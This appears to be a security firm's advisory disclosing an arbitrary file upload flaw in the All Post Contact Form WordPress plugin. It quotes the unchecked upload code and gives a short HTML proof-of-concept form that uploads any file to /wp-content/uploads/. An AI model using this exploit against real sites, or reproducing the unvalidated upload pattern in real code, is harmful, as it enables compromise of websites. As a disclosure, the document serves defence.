20 Sep

Arbitrary File Upload Vulnerability in All Post Contact Form

Through the proactive monitoring of changes in WordPress plugins for serious vulnerabilities we do, we recently found an an arbitrary file upload vulnerability in the All Post Contact Form plugin.

When the plugins shortcode, rlallpostcontactform, is on a post or page the the file /allpost-contactform-core.php is included. In that file the following code is run:

53
54
if(is_uploaded_file($_FILES['attachment_file']['tmp_name'])){
move_uploaded_file($_FILES['attachment_file']['tmp_name'],WP_CONTENT_DIR.'/uploads/'.$_FILES['attachment_file']['name'] );

That code checks if a file is included with the request with attribute name set as  “attachment_file” and if it is then the file is saved to the directory /wp-content/uploads/.

We contacted the developer about the vulnerability a week ago, but have not heard back from them. In line with our disclosure policy, which is based on the need to provide our customers with information on vulnerabilities on a timely basis, we are now disclosing this vulnerability.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/.

Make sure to replace “[path to shortcode post]” with the location of the post (or page) with the shortcode “rlallpostcontactform”.

<html>
<body>
<form action="[path to shortcode post]" method="POST" enctype="multipart/form-data">
<input type="file" name="attachment_file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • September 13, 2017 – Developer notified.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *